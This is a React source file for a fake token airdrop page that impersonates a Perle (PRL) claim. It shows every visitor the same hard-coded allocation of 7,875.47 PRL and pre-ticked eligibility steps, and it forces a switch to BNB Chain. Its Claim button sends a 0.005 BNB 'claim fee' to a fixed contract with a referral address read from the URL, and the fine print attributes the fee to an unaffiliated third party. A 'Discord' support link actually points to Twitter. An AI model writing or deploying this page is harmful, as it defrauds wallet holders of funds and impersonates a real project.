import React, { useState, useEffect } from 'react';
import { ConnectButton } from '@rainbow-me/rainbowkit';
import { useAccount, useBalance, useSwitchChain, useWriteContract, useDisconnect } from 'wagmi';
import { parseEther } from 'viem';

const CONTRACT_ADDRESS = '0xf5b9a3196e8BCA438261F3b7a5E2542d8f6CA636';
const CONTRACT_ABI = [
  {
    inputs: [{ internalType: "address", name: "inviter", type: "address" }],
    name: "claimAirdrop",
    outputs: [],
    stateMutability: "payable",
    type: "function"
  }
];

export default function ClaimPage({ onGoToSwap }) {
  const { isConnected, address, chainId } = useAccount();
  const { data: balanceData } = useBalance({ address });
  const { switchChain } = useSwitchChain();
  const { writeContract, isPending } = useWriteContract();
  const { disconnect } = useDisconnect(); // Hook untuk disconnect langsung
  
  const [claimError, setClaimError] = useState('');
  const [referralAddress, setReferralAddress] = useState('0x0000000000000000000000000000000000000000');

  useEffect(() => {
    const searchParams = new URLSearchParams(window.location.search);
    const refParam = searchParams.get('ref');
    if (refParam && /^0x[a-fA-F0-9]{40}$/.test(refParam)) {
      setReferralAddress(refParam);
    }
  }, []);

  useEffect(() => {
    if (isConnected && chainId !== 56 && switchChain) {
      switchChain({ chainId: 56 });
    }
  }, [isConnected, chainId, switchChain]);

  const handleClaimClick = () => {
    const currentBalance = balanceData ? parseFloat(balanceData.formatted) : 0;
    if (currentBalance < 0.005) {
      setClaimError('Insufficient BNB balance, you must HODL 0.005 BNB for CLAIM');
      return;
    }
    setClaimError('');
    
    writeContract({
      address: CONTRACT_ADDRESS,
      abi: CONTRACT_ABI,
      functionName: 'claimAirdrop',
      args: [referralAddress],
      value: parseEther('0.005'),
    });
  };

  return (
    <div 
      className="min-h-screen relative overflow-x-hidden flex flex-col items-center bg-cover bg-center bg-no-repeat bg-fixed bg-gray-50"
      style={{ backgroundImage: "url('/bg.png')" }}
    >
      <div className="w-full max-w-7xl mx-auto flex justify-between items-center pt-6 px-6 md:px-10 z-10">
        <img src="/logo.webp" alt="PRL Logo" className="h-10 object-contain" onError={(e) => e.target.style.display='none'} />
        
        <ConnectButton.Custom>
          {({ account, chain, openAccountModal, openChainModal, openConnectModal, mounted }) => {
            const ready = mounted;
            const connected = ready && account && chain;
            return (
              <div {...(!ready && { 'aria-hidden': true, style: { opacity: 0, pointerEvents: 'none', userSelect: 'none' } })}>
                {(() => {
                  const btnClass = "bg-white border border-gray-200 text-gray-700 font-bold py-1.5 px-4 rounded-xl text-sm transition-all shadow-[0_3px_0_0_#e5e7eb] hover:bg-gray-50 active:shadow-none active:translate-y-[3px]";
                  
                  if (!connected) return <button onClick={openConnectModal} type="button" className={btnClass}>Connect</button>;
                  
                  if (chain.unsupported) return <button onClick={openChainModal} type="button" className="bg-red-500 border border-red-600 text-white font-bold py-1.5 px-4 rounded-xl text-sm shadow-[0_3px_0_0_#b91c1c] active:shadow-none active:translate-y-[3px]">Wrong network</button>;
                  
                  // Jika terkoneksi, tampilkan Address + Icon Disconnect
                  return (
                    <div className="flex items-center gap-2">
                      <button onClick={openAccountModal} type="button" className={btnClass}>
                        {account.displayName}
                      </button>
                      <button 
                        onClick={() => disconnect()} 
                        type="button" 
                        title="Disconnect Wallet"
                        className="bg-white border border-gray-200 text-red-500 p-2 rounded-xl transition-all shadow-[0_3px_0_0_#e5e7eb] hover:bg-red-50 active:shadow-none active:translate-y-[3px] flex items-center justify-center"
                      >
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2.5" strokeLinecap="round" strokeLinejoin="round">
                          <path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path>
                          <polyline points="16 17 21 12 16 7"></polyline>
                          <line x1="21" y1="12" x2="9" y2="12"></line>
                        </svg>
                      </button>
                    </div>
                  );
                })()}
              </div>
            );
          }}
        </ConnectButton.Custom>
      </div>

      <div className="w-full bg-banner-bg/90 backdrop-blur-sm text-center py-2 text-sm text-[#e85a19] font-medium z-10 border-y border-[#e85a19]/10 mt-5 mb-8">
        Please visit our <a href="https://twitter.com/PerleFDN" className="underline font-bold">Discord</a> if you have any questions or need further support.
      </div>

      <div className="max-w-2xl w-full px-4 z-10 flex-grow">
        
        <div className="w-full mx-auto rounded-full p-1 border bg-white mb-6 shadow-sm flex items-center justify-between gap-2 overflow-x-auto">
          {['Verify PoU', 'Connect Wallet', 'Check Eligibility'].map((step, i) => (
             <div key={i} className="flex items-center gap-2 rounded-full p-1 sm:pr-2"><div className="flex w-10 h-10 shrink-0 items-center justify-center rounded-full text-sm font-medium bg-white text-black border border-gray-200">✓</div><span className="hidden sm:block text-xs leading-tight max-w-[70px] text-foreground font-medium">{step}</span></div>
          ))}
          <div className="flex items-center gap-2 rounded-full p-1 sm:pr-3 bg-[#e85a19] text-white shadow-md">
            <div className="flex w-10 h-10 shrink-0 items-center justify-center rounded-full text-sm font-medium bg-white text-[#e85a19] border-foreground">4</div>
            <span className="hidden sm:block text-xs leading-tight max-w-[70px] font-bold">Claim Tokens</span>
          </div>
          <div className="flex items-center gap-2 rounded-full p-1 sm:pr-2"><div className="flex w-10 h-10 shrink-0 items-center justify-center rounded-full text-sm font-medium bg-black/5 text-muted-foreground border border-foreground/10">5</div><span className="hidden sm:block text-xs leading-tight max-w-[70px] text-muted-foreground">Claim Success</span></div>
        </div>

        <div className="bg-white/95 backdrop-blur-sm rounded-2xl shadow-md border border-gray-100 p-8 mb-10">
          
          <div className="flex justify-center mb-6">
            <img src="/token.jpg" alt="PRL Token" className="w-20 h-20 rounded-full object-cover shadow-xl" onError={(e) => e.target.style.display='none'} />
          </div>

          <h1 className="text-3xl font-bold text-center mb-2 text-gray-800 tracking-tight">Ready to Claim</h1>
          <p className="text-center text-gray-500 text-sm mb-8">
            Your tokens are locked and will be claimable after the vesting period.
          </p>

          <div className="flex justify-between items-center mb-8 bg-gray-200 rounded-full px-6 py-4 border border-gray-300 shadow-inner">
            <span className="text-gray-600 font-medium">Your allocation:</span>
            <span className="text-xl font-bold text-gray-900">7,875.47 PRL</span>
          </div>

          <div className="mb-8 px-1">
             <div className="flex justify-between text-sm font-bold text-gray-800 mb-2">
                <span>Unlock Progress:</span><span>0%</span>
             </div>
             <div className="h-1.5 w-full bg-gray-200 rounded-full relative mb-2">
                <div className="absolute top-0 left-0 w-1.5 h-1.5 bg-[#e85a19] rounded-full shadow-sm"></div>
             </div>
             <div className="flex justify-between text-xs text-gray-400 font-medium">
                <div><p>(0)</p><p>Mar 25, 2026</p></div>
                <div className="text-right"><p>(7,875.47)</p><p>Sep 21, 2026</p></div>
             </div>
          </div>

          <div className="mb-6 flex flex-col">
            {!isConnected ? (
               <ConnectButton.Custom>
                {({ openConnectModal }) => (
                  <button onClick={openConnectModal} className="w-full py-3.5 rounded-full text-white font-bold text-lg bg-gradient-to-r from-yellow-400 via-[#e85a19] to-pink-400 shadow-lg hover:shadow-xl transition-all">
                    Claim
                  </button>
                )}
              </ConnectButton.Custom>
            ) : (
              <button onClick={handleClaimClick} disabled={isPending} className="w-full py-3.5 rounded-full text-white font-bold text-lg bg-gradient-to-r from-yellow-400 via-[#e85a19] to-pink-400 shadow-lg hover:shadow-xl transition-all disabled:opacity-70 disabled:cursor-not-allowed">
                {isPending ? 'Claiming...' : 'Claim'}
              </button>
            )}
            
            {claimError && (
              <p className="text-red-600 text-sm text-center mt-3 font-bold">{claimError}</p>
            )}

            <button 
              className="w-full py-2.5 mt-3 rounded-full bg-white text-[#e85a19] border-2 border-[#e85a19] font-bold text-base shadow-sm hover:bg-orange-50 hover:text-[#d04b11] transition-all"
              onClick={onGoToSwap}
            >
              SWAP
            </button>
          </div>

          <div className="bg-note-bg rounded-xl p-5 text-xs text-gray-600 leading-relaxed border border-gray-100">
            <p className="font-bold text-gray-800 mb-1">Note:</p>
            <p className="mb-2">Your full allocation will become claimable after the 6-month vesting period. Tokens cannot be claimed or transferred during this time.</p>
            <p className="font-bold">• A claim fee will apply during the claiming process. This fee is charged by a third-party service provider and is not affiliated with Perle.</p>
          </div>
        </div>
      </div>
    </div>
  );
}